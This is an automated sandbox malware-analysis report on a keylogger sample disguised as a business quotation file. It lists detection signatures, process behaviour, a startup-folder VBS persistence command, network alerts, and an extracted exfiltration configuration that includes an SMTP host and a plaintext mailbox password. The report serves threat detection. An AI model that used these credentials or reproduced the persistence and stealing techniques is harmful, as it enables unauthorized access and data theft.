Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION REQUIRED_Enatel s.r.l..exe

Overview

General Information

Sample name:QUOTATION REQUIRED_Enatel s.r.l..exe
Analysis ID:1590972
MD5:f8410bcd14256d6d355d7076a78c074f
SHA1:7ff600a40521fb8267fd305f601832785f975d40
SHA256:7e9b9833268dae6e33c83b582ec7fb353f0dc6514f869e3228f0effa161da00f
Tags:exeuser-James_inthe_box
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION REQUIRED_Enatel s.r.l..exe (PID: 7716 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe" MD5: F8410BCD14256D6D355D7076A78C074F)
    • ageless.exe (PID: 7768 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe" MD5: F8410BCD14256D6D355D7076A78C074F)
      • RegSvcs.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 8012 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ageless.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\supergroup\ageless.exe" MD5: F8410BCD14256D6D355D7076A78C074F)
      • RegSvcs.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\supergroup\ageless.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e12a:$a1: get_encryptedPassword
          • 0x2e453:$a2: get_encryptedUsername
          • 0x2df3a:$a3: get_timePasswordChanged
          • 0x2e043:$a4: get_passwordField
          • 0x2e140:$a5: set_encryptedPassword
          • 0x2f808:$a7: get_logins
          • 0x2f76b:$a10: KeyLoggerEventArgs
          • 0x2f3d0:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 29 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.ageless.exe.fe0000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.ageless.exe.fe0000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.ageless.exe.fe0000.1.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.ageless.exe.fe0000.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.ageless.exe.fe0000.1.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2e32a:$a1: get_encryptedPassword
                  • 0x2e653:$a2: get_encryptedUsername
                  • 0x2e13a:$a3: get_timePasswordChanged
                  • 0x2e243:$a4: get_passwordField
                  • 0x2e340:$a5: set_encryptedPassword
                  • 0x2fa08:$a7: get_logins
                  • 0x2f96b:$a10: KeyLoggerEventArgs
                  • 0x2f5d0:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 21 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , ProcessId: 8012, ProcessName: wscript.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7804, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49918
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs" , ProcessId: 8012, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\supergroup\ageless.exe, ProcessId: 7768, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-14T16:57:20.013836+010028033053Unknown Traffic192.168.2.1049766104.21.96.1443TCP
                  2025-01-14T16:57:22.657564+010028033053Unknown Traffic192.168.2.1049785104.21.96.1443TCP
                  2025-01-14T16:57:25.601214+010028033053Unknown Traffic192.168.2.1049808104.21.96.1443TCP
                  2025-01-14T16:57:28.336258+010028033053Unknown Traffic192.168.2.1049832104.21.96.1443TCP
                  2025-01-14T16:57:30.631224+010028033053Unknown Traffic192.168.2.1049843104.21.96.1443TCP
                  2025-01-14T16:57:36.898671+010028033053Unknown Traffic192.168.2.1049886104.21.96.1443TCP
                  2025-01-14T16:57:43.615561+010028033053Unknown Traffic192.168.2.1049937104.21.96.1443TCP
                  2025-01-14T16:57:46.229378+010028033053Unknown Traffic192.168.2.1049958104.21.96.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-14T16:57:18.409625+010028032742Potentially Bad Traffic192.168.2.1049754132.226.247.7380TCP
                  2025-01-14T16:57:19.378341+010028032742Potentially Bad Traffic192.168.2.1049754132.226.247.7380TCP
                  2025-01-14T16:57:20.753551+010028032742Potentially Bad Traffic192.168.2.1049772132.226.247.7380TCP
                  2025-01-14T16:57:35.393995+010028032742Potentially Bad Traffic192.168.2.1049871132.226.247.7380TCP
                  2025-01-14T16:57:36.347161+010028032742Potentially Bad Traffic192.168.2.1049871132.226.247.7380TCP
                  2025-01-14T16:57:37.659625+010028032742Potentially Bad Traffic192.168.2.1049889132.226.247.7380TCP
                  2025-01-14T16:57:39.013805+010028032742Potentially Bad Traffic192.168.2.1049901132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-14T16:57:32.292308+010018100071Potentially Bad Traffic192.168.2.1049853149.154.167.220443TCP
                  2025-01-14T16:57:47.106264+010018100071Potentially Bad Traffic192.168.2.1049962149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeAvira: detection malicious, Label: DR/AutoIt.Gen8
                  Found malware configuration
                  Source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Source: 2.2.ageless.exe.fe0000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "cash@com12345", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeReversingLabs: Detection: 39%
                  Multi AV Scanner detection for submitted file
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeReversingLabs: Detection: 39%
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeVirustotal: Detection: 34%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49760 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49877 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49962 version: TLS 1.2
                  Source: Binary string: vC:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbH= source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: ageless.exe, 00000002.00000003.1378208824.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000002.00000003.1379203618.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1566943933.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000008.00000003.1570215847.0000000003C40000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 2/oC:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: vws\dll\mscorlib.pdb source: RegSvcs.exe, 00000009.00000002.2619835798.00000000061F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.2619695946.0000000005DA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4C2A2 FindFirstFileExW,1_2_00F4C2A2
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F868EE FindFirstFileW,FindClose,1_2_00F868EE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,1_2_00F8698F
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D076
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00F7D3A9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F89642
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00F8979D
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,1_2_00F7DBBE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,1_2_00F89B2B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose,1_2_00F85C97
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D9C2A2 FindFirstFileExW,2_2_00D9C2A2
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD68EE FindFirstFileW,FindClose,2_2_00DD68EE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00DD698F
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD076
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00DCD3A9
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD9642
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DD979D
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00DCDBBE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00DD9B2B
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00DD5C97
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00C2F45Dh3_2_00C2F2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00C2F45Dh3_2_00C2F4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00C2F45Dh3_2_00C2F52F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B4FB8h3_2_062B4CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B9C38h3_2_062B9940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B8918h3_2_062B8620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B7130h3_2_062B6E38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B4160h3_2_062B3E68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B5948h3_2_062B5650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B2978h3_2_062B2680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B1190h3_2_062B0E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B8DE0h3_2_062B8AE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B4628h3_2_062B4330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B75F8h3_2_062B7300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B5E10h3_2_062B5B18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B1658h3_2_062B1360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B2E40h3_2_062B2B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B92A8h3_2_062B8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B62D8h3_2_062B5FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B4AF0h3_2_062B47F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B7AC0h3_2_062B77C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B1B20h3_2_062B1828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B3308h3_2_062B3010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B9770h3_2_062B9478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B0338h3_2_062B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B67A0h3_2_062B64A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B7F88h3_2_062B7C90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B1FE8h3_2_062B1CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B37D0h3_2_062B34D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B0800h3_2_062B0508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B6C68h3_2_062B6970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B8451h3_2_062B8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B3C98h3_2_062B39A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B24B0h3_2_062B21B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B5480h3_2_062B5188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 062B0CC8h3_2_062B09D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02A3F45Dh9_2_02A3F2C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02A3F45Dh9_2_02A3F4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 02A3FC19h9_2_02A3F960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663B3C8h9_2_0663AFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663AE01h9_2_0663AB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06630D0Dh9_2_06630B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06631697h9_2_06630B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06630673
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663E87Bh9_2_0663E5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06630040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663E421h9_2_0663E178
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663B3C8h9_2_0663AFA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663F261h9_2_0663EFB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663EE09h9_2_0663EB60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06630853
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663D719h9_2_0663D470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0663F6B9h9_2_0663F410
